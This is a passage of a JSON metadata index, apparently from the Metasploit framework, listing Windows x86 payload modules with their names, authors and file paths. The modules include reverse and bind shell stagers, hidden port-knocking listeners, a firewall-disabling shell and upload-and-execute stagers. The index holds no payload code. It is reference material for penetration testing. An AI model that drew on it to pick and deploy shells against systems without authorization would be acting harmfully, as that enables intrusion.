"sf <stephen_fewer@harmonysecurity.com>",
"UserExistsError"
],
"description": "Spawn a piped command shell (staged). Listen for a pipe connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-27 19:24:51 +0000",
"path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_nonx_tcp": {
"name": "Windows Command Shell, Bind TCP Stager (No NX or Win7)",
"full_name": "payload/windows/shell/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Spawn a piped command shell (staged). Listen for a connection (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_tcp": {
"name": "Windows Command Shell, Bind TCP Stager (Windows x86)",
"full_name": "payload/windows/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Spawn a piped command shell (staged). Listen for a connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_tcp_rc4": {
"name": "Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/shell/bind_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Spawn a piped command shell (staged). Listen for a connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/shell/bind_tcp_uuid": {
"name": "Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/shell/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Spawn a piped command shell (staged). Listen for a connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/find_tag": {
"name": "Windows Command Shell, Find Tag Ordinal Stager",
"full_name": "payload/windows/shell/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"skape <mmiller@hick.org>"
],
"description": "Spawn a piped command shell (staged). Use an established connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/findtag_ord.rb",
"is_install_path": true,
"ref_name": "windows/shell/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_ipv6_tcp": {
"name": "Windows Command Shell, Reverse TCP Stager (IPv6)",
"full_name": "payload/windows/shell/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker over IPv6",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_nonx_tcp": {
"name": "Windows Command Shell, Reverse TCP Stager (No NX or Win7)",
"full_name": "payload/windows/shell/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_ord_tcp": {
"name": "Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)",
"full_name": "payload/windows/shell/reverse_ord_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_ord_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_tcp": {
"name": "Windows Command Shell, Reverse TCP Stager",
"full_name": "payload/windows/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_tcp_allports": {
"name": "Windows Command Shell, Reverse All-Port TCP Stager",
"full_name": "payload/windows/shell/reverse_tcp_allports",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Spawn a piped command shell (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_tcp_allports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_tcp_dns": {
"name": "Windows Command Shell, Reverse TCP Stager (DNS)",
"full_name": "payload/windows/shell/reverse_tcp_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"RageLtMan"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_tcp_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_tcp_rc4": {
"name": "Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/shell/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/shell/reverse_tcp_rc4_dns": {
"name": "Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
"full_name": "payload/windows/shell/reverse_tcp_rc4_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_tcp_rc4_dns",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/shell/reverse_tcp_uuid": {
"name": "Windows Command Shell, Reverse TCP Stager with UUID Support",
"full_name": "payload/windows/shell/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_udp": {
"name": "Windows Command Shell, Reverse UDP Stager with UUID Support",
"full_name": "payload/windows/shell/reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_udp.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell_bind_tcp": {
"name": "Windows Command Shell, Bind TCP Inline",
"full_name": "payload/windows/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell_bind_tcp_xpfw": {
"name": "Windows Disable Windows ICF, Command Shell, Bind TCP Inline",
"full_name": "payload/windows/shell_bind_tcp_xpfw",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Lin0xx <lin0xx@metasploit.com>"
],
"description": "Disable the Windows ICF, then listen for a connection and spawn a command shell",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb",
"is_install_path": true,
"ref_name": "windows/shell_bind_tcp_xpfw",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell_hidden_bind_tcp": {
"name": "Windows Command Shell, Hidden Bind TCP Inline",
"full_name": "payload/windows/shell_hidden_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sd",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Listen for a connection from certain IP and spawn a command shell.\n The shellcode will reply with a RST packet if the connections is not\n coming from the IP defined in AHOST. This way the port will appear\n as \"closed\" helping us to hide the shellcode.",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell_hidden_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell_reverse_tcp": {
"name": "Windows Command Shell, Reverse TCP Inline",
"full_name": "payload/windows/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/speak_pwned": {
"name": "Windows Speech API - Say \"You Got Pwned!\"",
"full_name": "payload/windows/speak_pwned",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Berend-Jan \"SkyLined\" Wever <berendjanwever@gmail.com>"
],
"description": "Causes the target to say \"You Got Pwned\" via the Windows Speech API",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/speak_pwned.rb",
"is_install_path": true,
"ref_name": "windows/speak_pwned",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_hidden_ipknock_tcp": {
"name": "Windows Upload/Execute, Hidden Bind Ipknock TCP Stager",
"full_name": "payload/windows/upexec/bind_hidden_ipknock_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Uploads an executable and runs it (staged). Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_hidden_ipknock_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_hidden_tcp": {
"name": "Windows Upload/Execute, Hidden Bind TCP Stager",
"full_name": "payload/windows/upexec/bind_hidden_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Uploads an executable and runs it (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_hidden_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_ipv6_tcp": {
"name": "Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)",
"full_name": "payload/windows/upexec/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Uploads an executable and runs it (staged). Listen for an IPv6 connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_ipv6_tcp_uuid": {
"name": "Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/upexec/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"OJ Reeves"
],
"description": "Uploads an executable and runs it (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_named_pipe": {
"name": "Windows Upload/Execute, Windows x86 Bind Named Pipe Stager",
"full_name": "payload/windows/upexec/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"UserExistsError"
],
"description": "Uploads an executable and runs it (staged). Listen for a pipe connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-27 19:24:51 +0000",
"path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_nonx_tcp": {
"name": "Windows Upload/Execute, Bind TCP Stager (No NX or Win7)",
"full_name": "payload/windows/upexec/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Uploads an executable and runs it (staged). Listen for a connection (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_tcp": {
"name": "Windows Upload/Execute, Bind TCP Stager (Windows x86)",
"full_name": "payload/windows/upexec/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Uploads an executable and runs it (staged). Listen for a connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_tcp_rc4": {
"name": "Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/upexec/bind_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Uploads an executable and runs it (staged). Listen for a connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/upexec/bind_tcp_uuid": {
"name": "Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/upexec/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Uploads an executable and runs it (staged). Listen for a connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/find_tag": {
"name": "Windows Upload/Execute, Find Tag Ordinal Stager",
"full_name": "payload/windows/upexec/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"skape <mmiller@hick.org>"
],
"description": "Uploads an executable and runs it (staged). Use an established connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/findtag_ord.rb",
"is_install_path": true,
"ref_name": "windows/upexec/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_ipv6_tcp": {
"name": "Windows Upload/Execute, Reverse TCP Stager (IPv6)",
"full_name": "payload/windows/upexec/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker over IPv6",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_nonx_tcp": {
"name": "Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)",
"full_name": "payload/windows/upexec/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_ord_tcp": {
"name": "Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)",
"full_name": "payload/windows/upexec/reverse_ord_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"spoonm <spoonm@no$email.com>"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_ord_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_tcp": {
"name": "Windows Upload/Execute, Reverse TCP Stager",
"full_name": "payload/windows/upexec/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_tcp_allports": {
"name": "Windows Upload/Execute, Reverse All-Port TCP Stager",
"full_name": "payload/windows/upexec/reverse_tcp_allports",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Uploads an executable and runs it (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_tcp_allports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_tcp_dns": {
"name": "Windows Upload/Execute, Reverse TCP Stager (DNS)",
"full_name": "payload/windows/upexec/reverse_tcp_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"RageLtMan"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
